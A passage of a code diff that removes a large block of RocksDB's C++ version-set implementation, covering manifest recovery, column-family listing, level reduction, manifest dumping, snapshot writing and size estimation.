-    std::string version_edits;
-    for (auto& e : batch_edits) {
-      version_edits = version_edits + "\n" + e->DebugString(true);
-    }
-    ROCKS_LOG_ERROR(
-        db_options_->info_log,
-        "[%s] Error in committing version edit to MANIFEST: %s",
-        column_family_data ? column_family_data->GetName().c_str() : "<null>",
-        version_edits.c_str());
-    delete v;
-    if (new_descriptor_log) {
-      ROCKS_LOG_INFO(db_options_->info_log, "Deleting manifest %" PRIu64
-                                            " current manifest %" PRIu64 "\n",
-                     manifest_file_number_, pending_manifest_file_number_);
-      descriptor_log_.reset();
-      env_->DeleteFile(
-          DescriptorFileName(dbname_, pending_manifest_file_number_));
-    }
-  }
-  pending_manifest_file_number_ = 0;
-
-  // wake up all the waiting writers
-  while (true) {
-    ManifestWriter* ready = manifest_writers_.front();
-    manifest_writers_.pop_front();
-    if (ready != &w) {
-      ready->status = s;
-      ready->done = true;
-      ready->cv.Signal();
-    }
-    if (ready == last_writer) break;
-  }
-  // Notify new head of write queue
-  if (!manifest_writers_.empty()) {
-    manifest_writers_.front()->cv.Signal();
-  }
-  return s;
-}
-
-void VersionSet::LogAndApplyCFHelper(VersionEdit* edit) {
-  assert(edit->IsColumnFamilyManipulation());
-  edit->SetNextFile(next_file_number_.load());
-  edit->SetLastSequence(last_sequence_);
-  if (edit->is_column_family_drop_) {
-    // if we drop column family, we have to make sure to save max column family,
-    // so that we don't reuse existing ID
-    edit->SetMaxColumnFamily(column_family_set_->GetMaxColumnFamily());
-  }
-}
-
-void VersionSet::LogAndApplyHelper(ColumnFamilyData* cfd,
-                                   VersionBuilder* builder, Version* v,
-                                   VersionEdit* edit, InstrumentedMutex* mu) {
-  mu->AssertHeld();
-  assert(!edit->IsColumnFamilyManipulation());
-
-  if (edit->has_log_number_) {
-    assert(edit->log_number_ >= cfd->GetLogNumber());
-    assert(edit->log_number_ < next_file_number_.load());
-  }
-
-  if (!edit->has_prev_log_number_) {
-    edit->SetPrevLogNumber(prev_log_number_);
-  }
-  edit->SetNextFile(next_file_number_.load());
-  edit->SetLastSequence(last_sequence_);
-
-  builder->Apply(edit);
-}
-
-Status VersionSet::Recover(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    bool read_only) {
-  std::unordered_map<std::string, ColumnFamilyOptions> cf_name_to_options;
-  for (auto cf : column_families) {
-    cf_name_to_options.insert({cf.name, cf.options});
-  }
-  // keeps track of column families in manifest that were not found in
-  // column families parameters. if those column families are not dropped
-  // by subsequent manifest records, Recover() will return failure status
-  std::unordered_map<int, std::string> column_families_not_found;
-
-  // Read "CURRENT" file, which contains a pointer to the current manifest file
-  std::string manifest_filename;
-  Status s = ReadFileToString(
-      env_, CurrentFileName(dbname_), &manifest_filename
-  );
-  if (!s.ok()) {
-    return s;
-  }
-  if (manifest_filename.empty() ||
-      manifest_filename.back() != '\n') {
-    return Status::Corruption("CURRENT file does not end with newline");
-  }
-  // remove the trailing '\n'
-  manifest_filename.resize(manifest_filename.size() - 1);
-  FileType type;
-  bool parse_ok =
-      ParseFileName(manifest_filename, &manifest_file_number_, &type);
-  if (!parse_ok || type != kDescriptorFile) {
-    return Status::Corruption("CURRENT file corrupted");
-  }
-
-  ROCKS_LOG_INFO(db_options_->info_log, "Recovering from manifest file: %s\n",
-                 manifest_filename.c_str());
-
-  manifest_filename = dbname_ + "/" + manifest_filename;
-  unique_ptr<SequentialFileReader> manifest_file_reader;
-  {
-    unique_ptr<SequentialFile> manifest_file;
-    s = env_->NewSequentialFile(manifest_filename, &manifest_file,
-                                env_->OptimizeForManifestRead(env_options_));
-    if (!s.ok()) {
-      return s;
-    }
-    manifest_file_reader.reset(
-        new SequentialFileReader(std::move(manifest_file)));
-  }
-  uint64_t current_manifest_file_size;
-  s = env_->GetFileSize(manifest_filename, &current_manifest_file_size);
-  if (!s.ok()) {
-    return s;
-  }
-
-  bool have_log_number = false;
-  bool have_prev_log_number = false;
-  bool have_next_file = false;
-  bool have_last_sequence = false;
-  uint64_t next_file = 0;
-  uint64_t last_sequence = 0;
-  uint64_t log_number = 0;
-  uint64_t previous_log_number = 0;
-  uint32_t max_column_family = 0;
-  std::unordered_map<uint32_t, BaseReferencedVersionBuilder*> builders;
-
-  // add default column family
-  auto default_cf_iter = cf_name_to_options.find(kDefaultColumnFamilyName);
-  if (default_cf_iter == cf_name_to_options.end()) {
-    return Status::InvalidArgument("Default column family not specified");
-  }
-  VersionEdit default_cf_edit;
-  default_cf_edit.AddColumnFamily(kDefaultColumnFamilyName);
-  default_cf_edit.SetColumnFamily(0);
-  ColumnFamilyData* default_cfd =
-      CreateColumnFamily(default_cf_iter->second, &default_cf_edit);
-  // In recovery, nobody else can access it, so it's fine to set it to be
-  // initialized earlier.
-  default_cfd->set_initialized();
-  builders.insert({0, new BaseReferencedVersionBuilder(default_cfd)});
-
-  {
-    VersionSet::LogReporter reporter;
-    reporter.status = &s;
-    log::Reader reader(NULL, std::move(manifest_file_reader), &reporter,
-                       true /*checksum*/, 0 /*initial_offset*/, 0);
-    Slice record;
-    std::string scratch;
-    while (reader.ReadRecord(&record, &scratch) && s.ok()) {
-      VersionEdit edit;
-      s = edit.DecodeFrom(record);
-      if (!s.ok()) {
-        break;
-      }
-
-      // Not found means that user didn't supply that column
-      // family option AND we encountered column family add
-      // record. Once we encounter column family drop record,
-      // we will delete the column family from
-      // column_families_not_found.
-      bool cf_in_not_found =
-          column_families_not_found.find(edit.column_family_) !=
-          column_families_not_found.end();
-      // in builders means that user supplied that column family
-      // option AND that we encountered column family add record
-      bool cf_in_builders =
-          builders.find(edit.column_family_) != builders.end();
-
-      // they can't both be true
-      assert(!(cf_in_not_found && cf_in_builders));
-
-      ColumnFamilyData* cfd = nullptr;
-
-      if (edit.is_column_family_add_) {
-        if (cf_in_builders || cf_in_not_found) {
-          s = Status::Corruption(
-              "Manifest adding the same column family twice");
-          break;
-        }
-        auto cf_options = cf_name_to_options.find(edit.column_family_name_);
-        if (cf_options == cf_name_to_options.end()) {
-          column_families_not_found.insert(
-              {edit.column_family_, edit.column_family_name_});
-        } else {
-          cfd = CreateColumnFamily(cf_options->second, &edit);
-          cfd->set_initialized();
-          builders.insert(
-              {edit.column_family_, new BaseReferencedVersionBuilder(cfd)});
-        }
-      } else if (edit.is_column_family_drop_) {
-        if (cf_in_builders) {
-          auto builder = builders.find(edit.column_family_);
-          assert(builder != builders.end());
-          delete builder->second;
-          builders.erase(builder);
-          cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-          if (cfd->Unref()) {
-            delete cfd;
-            cfd = nullptr;
-          } else {
-            // who else can have reference to cfd!?
-            assert(false);
-          }
-        } else if (cf_in_not_found) {
-          column_families_not_found.erase(edit.column_family_);
-        } else {
-          s = Status::Corruption(
-              "Manifest - dropping non-existing column family");
-          break;
-        }
-      } else if (!cf_in_not_found) {
-        if (!cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest record referencing unknown column family");
-          break;
-        }
-
-        cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-        // this should never happen since cf_in_builders is true
-        assert(cfd != nullptr);
-
-        // if it is not column family add or column family drop,
-        // then it's a file add/delete, which should be forwarded
-        // to builder
-        auto builder = builders.find(edit.column_family_);
-        assert(builder != builders.end());
-        builder->second->version_builder()->Apply(&edit);
-      }
-
-      if (cfd != nullptr) {
-        if (edit.has_log_number_) {
-          if (cfd->GetLogNumber() > edit.log_number_) {
-            ROCKS_LOG_WARN(
-                db_options_->info_log,
-                "MANIFEST corruption detected, but ignored - Log numbers in "
-                "records NOT monotonically increasing");
-          } else {
-            cfd->SetLogNumber(edit.log_number_);
-            have_log_number = true;
-          }
-        }
-        if (edit.has_comparator_ &&
-            edit.comparator_ != cfd->user_comparator()->Name()) {
-          s = Status::InvalidArgument(
-              cfd->user_comparator()->Name(),
-              "does not match existing comparator " + edit.comparator_);
-          break;
-        }
-      }
-
-      if (edit.has_prev_log_number_) {
-        previous_log_number = edit.prev_log_number_;
-        have_prev_log_number = true;
-      }
-
-      if (edit.has_next_file_number_) {
-        next_file = edit.next_file_number_;
-        have_next_file = true;
-      }
-
-      if (edit.has_max_column_family_) {
-        max_column_family = edit.max_column_family_;
-      }
-
-      if (edit.has_last_sequence_) {
-        last_sequence = edit.last_sequence_;
-        have_last_sequence = true;
-      }
-    }
-  }
-
-  if (s.ok()) {
-    if (!have_next_file) {
-      s = Status::Corruption("no meta-nextfile entry in descriptor");
-    } else if (!have_log_number) {
-      s = Status::Corruption("no meta-lognumber entry in descriptor");
-    } else if (!have_last_sequence) {
-      s = Status::Corruption("no last-sequence-number entry in descriptor");
-    }
-
-    if (!have_prev_log_number) {
-      previous_log_number = 0;
-    }
-
-    column_family_set_->UpdateMaxColumnFamily(max_column_family);
-
-    MarkFileNumberUsedDuringRecovery(previous_log_number);
-    MarkFileNumberUsedDuringRecovery(log_number);
-  }
-
-  // there were some column families in the MANIFEST that weren't specified
-  // in the argument. This is OK in read_only mode
-  if (read_only == false && !column_families_not_found.empty()) {
-    std::string list_of_not_found;
-    for (const auto& cf : column_families_not_found) {
-      list_of_not_found += ", " + cf.second;
-    }
-    list_of_not_found = list_of_not_found.substr(2);
-    s = Status::InvalidArgument(
-        "You have to open all column families. Column families not opened: " +
-        list_of_not_found);
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *column_family_set_) {
-      assert(builders.count(cfd->GetID()) > 0);
-      auto* builder = builders[cfd->GetID()]->version_builder();
-      if (!builder->CheckConsistencyForNumLevels()) {
-        s = Status::InvalidArgument(
-            "db has more levels than options.num_levels");
-        break;
-      }
-    }
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *column_family_set_) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      assert(cfd->initialized());
-      auto builders_iter = builders.find(cfd->GetID());
-      assert(builders_iter != builders.end());
-      auto* builder = builders_iter->second->version_builder();
-
-      if (GetColumnFamilySet()->get_table_cache()->GetCapacity() ==
-          TableCache::kInfiniteCapacity) {
-        // unlimited table cache. Pre-load table handle now.
-        // Need to do it out of the mutex.
-        builder->LoadTableHandlers(
-            cfd->internal_stats(), db_options_->max_file_opening_threads,
-            false /* prefetch_index_and_filter_in_cache */);
-      }
-
-      Version* v = new Version(cfd, this, current_version_number_++);
-      builder->SaveTo(v->storage_info());
-
-      // Install recovered version
-      v->PrepareApply(*cfd->GetLatestMutableCFOptions(),
-          !(db_options_->skip_stats_update_on_db_open));
-      AppendVersion(cfd, v);
-    }
-
-    manifest_file_size_ = current_manifest_file_size;
-    next_file_number_.store(next_file + 1);
-    last_to_be_written_sequence_ = last_sequence;
-    last_sequence_ = last_sequence;
-    prev_log_number_ = previous_log_number;
-
-    ROCKS_LOG_INFO(
-        db_options_->info_log,
-        "Recovered from manifest file:%s succeeded,"
-        "manifest_file_number is %lu, next_file_number is %lu, "
-        "last_sequence is %lu, log_number is %lu,"
-        "prev_log_number is %lu,"
-        "max_column_family is %u\n",
-        manifest_filename.c_str(), (unsigned long)manifest_file_number_,
-        (unsigned long)next_file_number_.load(), (unsigned long)last_sequence_,
-        (unsigned long)log_number, (unsigned long)prev_log_number_,
-        column_family_set_->GetMaxColumnFamily());
-
-    for (auto cfd : *column_family_set_) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      ROCKS_LOG_INFO(db_options_->info_log,
-                     "Column family [%s] (ID %u), log number is %" PRIu64 "\n",
-                     cfd->GetName().c_str(), cfd->GetID(), cfd->GetLogNumber());
-    }
-  }
-
-  for (auto& builder : builders) {
-    delete builder.second;
-  }
-
-  return s;
-}
-
-Status VersionSet::ListColumnFamilies(std::vector<std::string>* column_families,
-                                      const std::string& dbname, Env* env) {
-  // these are just for performance reasons, not correcntes,
-  // so we're fine using the defaults
-  EnvOptions soptions;
-  // Read "CURRENT" file, which contains a pointer to the current manifest file
-  std::string current;
-  Status s = ReadFileToString(env, CurrentFileName(dbname), &current);
-  if (!s.ok()) {
-    return s;
-  }
-  if (current.empty() || current[current.size()-1] != '\n') {
-    return Status::Corruption("CURRENT file does not end with newline");
-  }
-  current.resize(current.size() - 1);
-
-  std::string dscname = dbname + "/" + current;
-
-  unique_ptr<SequentialFileReader> file_reader;
-  {
-  unique_ptr<SequentialFile> file;
-  s = env->NewSequentialFile(dscname, &file, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  file_reader.reset(new SequentialFileReader(std::move(file)));
-  }
-
-  std::map<uint32_t, std::string> column_family_names;
-  // default column family is always implicitly there
-  column_family_names.insert({0, kDefaultColumnFamilyName});
-  VersionSet::LogReporter reporter;
-  reporter.status = &s;
-  log::Reader reader(NULL, std::move(file_reader), &reporter, true /*checksum*/,
-                     0 /*initial_offset*/, 0);
-  Slice record;
-  std::string scratch;
-  while (reader.ReadRecord(&record, &scratch) && s.ok()) {
-    VersionEdit edit;
-    s = edit.DecodeFrom(record);
-    if (!s.ok()) {
-      break;
-    }
-    if (edit.is_column_family_add_) {
-      if (column_family_names.find(edit.column_family_) !=
-          column_family_names.end()) {
-        s = Status::Corruption("Manifest adding the same column family twice");
-        break;
-      }
-      column_family_names.insert(
-          {edit.column_family_, edit.column_family_name_});
-    } else if (edit.is_column_family_drop_) {
-      if (column_family_names.find(edit.column_family_) ==
-          column_family_names.end()) {
-        s = Status::Corruption(
-            "Manifest - dropping non-existing column family");
-        break;
-      }
-      column_family_names.erase(edit.column_family_);
-    }
-  }
-
-  column_families->clear();
-  if (s.ok()) {
-    for (const auto& iter : column_family_names) {
-      column_families->push_back(iter.second);
-    }
-  }
-
-  return s;
-}
-
-#ifndef ROCKSDB_LITE
-Status VersionSet::ReduceNumberOfLevels(const std::string& dbname,
-                                        const Options* options,
-                                        const EnvOptions& env_options,
-                                        int new_levels) {
-  if (new_levels <= 1) {
-    return Status::InvalidArgument(
-        "Number of levels needs to be bigger than 1");
-  }
-
-  ImmutableDBOptions db_options(*options);
-  ColumnFamilyOptions cf_options(*options);
-  std::shared_ptr<Cache> tc(NewLRUCache(options->max_open_files - 10,
-                                        options->table_cache_numshardbits));
-  WriteController wc(options->delayed_write_rate);
-  WriteBufferManager wb(options->db_write_buffer_size);
-  VersionSet versions(dbname, &db_options, env_options, tc.get(), &wb, &wc);
-  Status status;
-
-  std::vector<ColumnFamilyDescriptor> dummy;
-  ColumnFamilyDescriptor dummy_descriptor(kDefaultColumnFamilyName,
-                                          ColumnFamilyOptions(*options));
-  dummy.push_back(dummy_descriptor);
-  status = versions.Recover(dummy);
-  if (!status.ok()) {
-    return status;
-  }
-
-  Version* current_version =
-      versions.GetColumnFamilySet()->GetDefault()->current();
-  auto* vstorage = current_version->storage_info();
-  int current_levels = vstorage->num_levels();
-
-  if (current_levels <= new_levels) {
-    return Status::OK();
-  }
-
-  // Make sure there are file only on one level from
-  // (new_levels-1) to (current_levels-1)
-  int first_nonempty_level = -1;
-  int first_nonempty_level_filenum = 0;
-  for (int i = new_levels - 1; i < current_levels; i++) {
-    int file_num = vstorage->NumLevelFiles(i);
-    if (file_num != 0) {
-      if (first_nonempty_level < 0) {
-        first_nonempty_level = i;
-        first_nonempty_level_filenum = file_num;
-      } else {
-        char msg[255];
-        snprintf(msg, sizeof(msg),
-                 "Found at least two levels containing files: "
-                 "[%d:%d],[%d:%d].\n",
-                 first_nonempty_level, first_nonempty_level_filenum, i,
-                 file_num);
-        return Status::InvalidArgument(msg);
-      }
-    }
-  }
-
-  // we need to allocate an array with the old number of levels size to
-  // avoid SIGSEGV in WriteSnapshot()
-  // however, all levels bigger or equal to new_levels will be empty
-  std::vector<FileMetaData*>* new_files_list =
-      new std::vector<FileMetaData*>[current_levels];
-  for (int i = 0; i < new_levels - 1; i++) {
-    new_files_list[i] = vstorage->LevelFiles(i);
-  }
-
-  if (first_nonempty_level > 0) {
-    new_files_list[new_levels - 1] = vstorage->LevelFiles(first_nonempty_level);
-  }
-
-  delete[] vstorage -> files_;
-  vstorage->files_ = new_files_list;
-  vstorage->num_levels_ = new_levels;
-
-  MutableCFOptions mutable_cf_options(*options);
-  VersionEdit ve;
-  InstrumentedMutex dummy_mutex;
-  InstrumentedMutexLock l(&dummy_mutex);
-  return versions.LogAndApply(
-      versions.GetColumnFamilySet()->GetDefault(),
-      mutable_cf_options, &ve, &dummy_mutex, nullptr, true);
-}
-
-Status VersionSet::DumpManifest(Options& options, std::string& dscname,
-                                bool verbose, bool hex, bool json) {
-  // Open the specified manifest file.
-  unique_ptr<SequentialFileReader> file_reader;
-  Status s;
-  {
-    unique_ptr<SequentialFile> file;
-    s = options.env->NewSequentialFile(
-        dscname, &file, env_->OptimizeForManifestRead(env_options_));
-    if (!s.ok()) {
-      return s;
-    }
-    file_reader.reset(new SequentialFileReader(std::move(file)));
-  }
-
-  bool have_prev_log_number = false;
-  bool have_next_file = false;
-  bool have_last_sequence = false;
-  uint64_t next_file = 0;
-  uint64_t last_sequence = 0;
-  uint64_t previous_log_number = 0;
-  int count = 0;
-  std::unordered_map<uint32_t, std::string> comparators;
-  std::unordered_map<uint32_t, BaseReferencedVersionBuilder*> builders;
-
-  // add default column family
-  VersionEdit default_cf_edit;
-  default_cf_edit.AddColumnFamily(kDefaultColumnFamilyName);
-  default_cf_edit.SetColumnFamily(0);
-  ColumnFamilyData* default_cfd =
-      CreateColumnFamily(ColumnFamilyOptions(options), &default_cf_edit);
-  builders.insert({0, new BaseReferencedVersionBuilder(default_cfd)});
-
-  {
-    VersionSet::LogReporter reporter;
-    reporter.status = &s;
-    log::Reader reader(NULL, std::move(file_reader), &reporter,
-                       true /*checksum*/, 0 /*initial_offset*/, 0);
-    Slice record;
-    std::string scratch;
-    while (reader.ReadRecord(&record, &scratch) && s.ok()) {
-      VersionEdit edit;
-      s = edit.DecodeFrom(record);
-      if (!s.ok()) {
-        break;
-      }
-
-      // Write out each individual edit
-      if (verbose && !json) {
-        printf("%s\n", edit.DebugString(hex).c_str());
-      } else if (json) {
-        printf("%s\n", edit.DebugJSON(count, hex).c_str());
-      }
-      count++;
-
-      bool cf_in_builders =
-          builders.find(edit.column_family_) != builders.end();
-
-      if (edit.has_comparator_) {
-        comparators.insert({edit.column_family_, edit.comparator_});
-      }
-
-      ColumnFamilyData* cfd = nullptr;
-
-      if (edit.is_column_family_add_) {
-        if (cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest adding the same column family twice");
-          break;
-        }
-        cfd = CreateColumnFamily(ColumnFamilyOptions(options), &edit);
-        cfd->set_initialized();
-        builders.insert(
-            {edit.column_family_, new BaseReferencedVersionBuilder(cfd)});
-      } else if (edit.is_column_family_drop_) {
-        if (!cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest - dropping non-existing column family");
-          break;
-        }
-        auto builder_iter = builders.find(edit.column_family_);
-        delete builder_iter->second;
-        builders.erase(builder_iter);
-        comparators.erase(edit.column_family_);
-        cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-        assert(cfd != nullptr);
-        cfd->Unref();
-        delete cfd;
-        cfd = nullptr;
-      } else {
-        if (!cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest record referencing unknown column family");
-          break;
-        }
-
-        cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-        // this should never happen since cf_in_builders is true
-        assert(cfd != nullptr);
-
-        // if it is not column family add or column family drop,
-        // then it's a file add/delete, which should be forwarded
-        // to builder
-        auto builder = builders.find(edit.column_family_);
-        assert(builder != builders.end());
-        builder->second->version_builder()->Apply(&edit);
-      }
-
-      if (cfd != nullptr && edit.has_log_number_) {
-        cfd->SetLogNumber(edit.log_number_);
-      }
-
-      if (edit.has_prev_log_number_) {
-        previous_log_number = edit.prev_log_number_;
-        have_prev_log_number = true;
-      }
-
-      if (edit.has_next_file_number_) {
-        next_file = edit.next_file_number_;
-        have_next_file = true;
-      }
-
-      if (edit.has_last_sequence_) {
-        last_sequence = edit.last_sequence_;
-        have_last_sequence = true;
-      }
-
-      if (edit.has_max_column_family_) {
-        column_family_set_->UpdateMaxColumnFamily(edit.max_column_family_);
-      }
-    }
-  }
-  file_reader.reset();
-
-  if (s.ok()) {
-    if (!have_next_file) {
-      s = Status::Corruption("no meta-nextfile entry in descriptor");
-      printf("no meta-nextfile entry in descriptor");
-    } else if (!have_last_sequence) {
-      printf("no last-sequence-number entry in descriptor");
-      s = Status::Corruption("no last-sequence-number entry in descriptor");
-    }
-
-    if (!have_prev_log_number) {
-      previous_log_number = 0;
-    }
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *column_family_set_) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      auto builders_iter = builders.find(cfd->GetID());
-      assert(builders_iter != builders.end());
-      auto builder = builders_iter->second->version_builder();
-
-      Version* v = new Version(cfd, this, current_version_number_++);
-      builder->SaveTo(v->storage_info());
-      v->PrepareApply(*cfd->GetLatestMutableCFOptions(), false);
-
-      printf("--------------- Column family \"%s\"  (ID %u) --------------\n",
-             cfd->GetName().c_str(), (unsigned int)cfd->GetID());
-      printf("log number: %lu\n", (unsigned long)cfd->GetLogNumber());
-      auto comparator = comparators.find(cfd->GetID());
-      if (comparator != comparators.end()) {
-        printf("comparator: %s\n", comparator->second.c_str());
-      } else {
-        printf("comparator: <NO COMPARATOR>\n");
-      }
-      printf("%s \n", v->DebugString(hex).c_str());
-      delete v;
-    }
-
-    // Free builders
-    for (auto& builder : builders) {
-      delete builder.second;
-    }
-
-    next_file_number_.store(next_file + 1);
-    last_to_be_written_sequence_ = last_sequence;
-    last_sequence_ = last_sequence;
-    prev_log_number_ = previous_log_number;
-
-    printf(
-        "next_file_number %lu last_sequence "
-        "%lu  prev_log_number %lu max_column_family %u\n",
-        (unsigned long)next_file_number_.load(), (unsigned long)last_sequence,
-        (unsigned long)previous_log_number,
-        column_family_set_->GetMaxColumnFamily());
-  }
-
-  return s;
-}
-#endif  // ROCKSDB_LITE
-
-void VersionSet::MarkFileNumberUsedDuringRecovery(uint64_t number) {
-  // only called during recovery which is single threaded, so this works because
-  // there can't be concurrent calls
-  if (next_file_number_.load(std::memory_order_relaxed) <= number) {
-    next_file_number_.store(number + 1, std::memory_order_relaxed);
-  }
-}
-
-Status VersionSet::WriteSnapshot(log::Writer* log) {
-  // TODO: Break up into multiple records to reduce memory usage on recovery?
-
-  // WARNING: This method doesn't hold a mutex!!
-
-  // This is done without DB mutex lock held, but only within single-threaded
-  // LogAndApply. Column family manipulations can only happen within LogAndApply
-  // (the same single thread), so we're safe to iterate.
-  for (auto cfd : *column_family_set_) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    assert(cfd->initialized());
-    {
-      // Store column family info
-      VersionEdit edit;
-      if (cfd->GetID() != 0) {
-        // default column family is always there,
-        // no need to explicitly write it
-        edit.AddColumnFamily(cfd->GetName());
-        edit.SetColumnFamily(cfd->GetID());
-      }
-      edit.SetComparatorName(
-          cfd->internal_comparator().user_comparator()->Name());
-      std::string record;
-      if (!edit.EncodeTo(&record)) {
-        return Status::Corruption(
-            "Unable to Encode VersionEdit:" + edit.DebugString(true));
-      }
-      Status s = log->AddRecord(record);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-
-    {
-      // Save files
-      VersionEdit edit;
-      edit.SetColumnFamily(cfd->GetID());
-
-      for (int level = 0; level < cfd->NumberLevels(); level++) {
-        for (const auto& f :
-             cfd->current()->storage_info()->LevelFiles(level)) {
-          edit.AddFile(level, f->fd.GetNumber(), f->fd.GetPathId(),
-                       f->fd.GetFileSize(), f->smallest, f->largest,
-                       f->smallest_seqno, f->largest_seqno,
-                       f->marked_for_compaction);
-        }
-      }
-      edit.SetLogNumber(cfd->GetLogNumber());
-      std::string record;
-      if (!edit.EncodeTo(&record)) {
-        return Status::Corruption(
-            "Unable to Encode VersionEdit:" + edit.DebugString(true));
-      }
-      Status s = log->AddRecord(record);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-
-  return Status::OK();
-}
-
-// TODO(aekmekji): in CompactionJob::GenSubcompactionBoundaries(), this
-// function is called repeatedly with consecutive pairs of slices. For example
-// if the slice list is [a, b, c, d] this function is called with arguments
-// (a,b) then (b,c) then (c,d). Knowing this, an optimization is possible where
-// we avoid doing binary search for the keys b and c twice and instead somehow
-// maintain state of where they first appear in the files.
-uint64_t VersionSet::ApproximateSize(Version* v, const Slice& start,
-                                     const Slice& end, int start_level,
-                                     int end_level) {
-  // pre-condition
-  assert(v->cfd_->internal_comparator().Compare(start, end) <= 0);
-
-  uint64_t size = 0;
-  const auto* vstorage = v->storage_info();
-  end_level = end_level == -1
-                  ? vstorage->num_non_empty_levels()
-                  : std::min(end_level, vstorage->num_non_empty_levels());
-
-  assert(start_level <= end_level);
-
-  for (int level = start_level; level < end_level; level++) {
-    const LevelFilesBrief& files_brief = vstorage->LevelFilesBrief(level);
-    if (!files_brief.num_files) {
-      // empty level, skip exploration
-      continue;
-    }
-
-    if (!level) {
-      // level 0 data is sorted order, handle the use case explicitly
-      size += ApproximateSizeLevel0(v, files_brief, start, end);
-      continue;
-    }
-
-    assert(level > 0);
-    assert(files_brief.num_files > 0);
-
-    // identify the file position for starting key
-    const uint64_t idx_start = FindFileInRange(
-        v->cfd_->internal_comparator(), files_brief, start,
-        /*start=*/0, static_cast<uint32_t>(files_brief.num_files - 1));
-    assert(idx_start < files_brief.num_files);
-
-    // scan all files from the starting position until the ending position
-    // inferred from the sorted order
-    for (uint64_t i = idx_start; i < files_brief.num_files; i++) {
-      uint64_t val;
-      val = ApproximateSize(v, files_brief.files[i], end);
-      if (!val) {
-        // the files after this will not have the range
-        break;
-      }
-
-      size += val;
-
-      if (i == idx_start) {
-        // subtract the bytes needed to be scanned to get to the starting
-        // key
-        val = ApproximateSize(v, files_brief.files[i], start);
-        assert(size >= val);
-        size -= val;
-      }
-    }
-  }
-
-  return size;
-}
-
-uint64_t VersionSet::ApproximateSizeLevel0(Version* v,
-                                           const LevelFilesBrief& files_brief,
-                                           const Slice& key_start,
-                                           const Slice& key_end) {
-  // level 0 files are not in sorted order, we need to iterate through
-  // the list to compute the total bytes that require scanning
-  uint64_t size = 0;
-  for (size_t i = 0; i < files_brief.num_files; i++) {
-    const uint64_t start = ApproximateSize(v, files_brief.files[i], key_start);
-    const uint64_t end = ApproximateSize(v, files_brief.files[i], key_end);
-    assert(end >= start);
-    size += end - start;
-  }
-  return size;
-}
-
-uint64_t VersionSet::ApproximateSize(Version* v, const FdWithKeyRange& f,
-                                     const Slice& key) {
-  // pre-condition
-  assert(v);
-
-  uint64_t result = 0;
-  if (v->cfd_->internal_comparator().Compare(f.largest_key, key) <= 0) {
-    // Entire file is before "key", so just add the file size
-    result = f.fd.GetFileSize();
-  } else if (v->cfd_->internal_comparator().Compare(f.smallest_key, key) > 0) {
-    // Entire file is after "key", so ignore
-    result = 0;
-  } else {
-    // "key" falls in the range for this table.  Add the
-    // approximate offset of "key" within the table.
-    TableReader* table_reader_ptr;
-    InternalIterator* iter = v->cfd_->table_cache()->NewIterator(
-        ReadOptions(), env_options_, v->cfd_->internal_comparator(), f.fd,
-        nullptr /* range_del_agg */, &table_reader_ptr);
-    if (table_reader_ptr != nullptr) {
-      result = table_reader_ptr->ApproximateOffsetOf(key);
-    }
-    delete iter;
-  }
-  return result;
-}
-
-void VersionSet::AddLiveFiles(std::vector<FileDescriptor>* live_list) {
-  // pre-calculate space requirement
-  int64_t total_files = 0;
-  for (auto cfd : *column_family_set_) {
-    if (!cfd->initialized()) {
-      continue;
-    }
-    Version* dummy_versions = cfd->dummy_versions();
-    for (Version* v = dummy_versions->next_; v != dummy_versions;
-         v = v->next_) {
-      const auto* vstorage = v->storage_info();
-      for (int level = 0; level < vstorage->num_levels(); level++) {
-        total_files += vstorage->LevelFiles(level).size();
-      }
-    }
-  }
-
-  // just one time extension to the right size
-  live_list->reserve(live_list->size() + static_cast<size_t>(total_files));
-
-  for (auto cfd : *column_family_set_) {
-    if (!cfd->initialized()) {
-      continue;
-    }
-    auto* current = cfd->current();
-    bool found_current = false;
-    Version* dummy_versions = cfd->dummy_versions();
-    for (Version* v = dummy_versions->next_; v != dummy_versions;
-         v = v->next_) {
-      v->AddLiveFiles(live_list);
-      if (v == current) {
-        found_current = true;
-      }
-    }
-    if (!found_current && current != nullptr) {
-      // Should never happen unless it is a bug.
-      assert(false);
-      current->AddLiveFiles(live_list);
-    }
-  }
-}
-
-InternalIterator* VersionSet::MakeInputIterator(
-    const Compaction* c, RangeDelAggregator* range_del_agg) {
-  auto cfd = c->column_family_data();
-  ReadOptions read_options;
-  read_options.verify_checksums = true;
-  read_options.fill_cache = false;
-  // Compaction iterators shouldn't be confined to a single prefix.
-  // Compactions use Seek() for
-  // (a) concurrent compactions,
-  // (b) CompactionFilter::Decision::kRemoveAndSkipUntil.
-  read_options.total_order_seek = true;
-
-  // Level-0 files have to be merged together.  For other levels,
-  // we will make a concatenating iterator per level.
-  // TODO(opt): use concatenating iterator for level-0 if there is no overlap
-  const size_t space = (c->level() == 0 ? c->input_levels(0)->num_files +
-                                              c->num_input_levels() - 1
-                                        : c->num_input_levels());
-  InternalIterator** list = new InternalIterator* [space];
-  size_t num = 0;
-  for (size_t which = 0; which < c->num_input_levels(); which++) {
-    if (c->input_levels(which)->num_files != 0) {
-      if (c->level(which) == 0) {
-        const LevelFilesBrief* flevel = c->input_levels(which);
-        for (size_t i = 0; i < flevel->num_files; i++) {
-          list[num++] = cfd->table_cache()->NewIterator(
-              read_options, env_options_compactions_,
-              cfd->internal_comparator(), flevel->files[i].fd, range_del_agg,
-              nullptr /* table_reader_ptr */,
-              nullptr /* no per level latency histogram */,
-              true /* for_compaction */, nullptr /* arena */,
-              false /* skip_filters */, (int)which /* level */);
-        }
-      } else {
-        // Create concatenating iterator for the files from this level
-        list[num++] = NewTwoLevelIterator(
-            new LevelFileIteratorState(
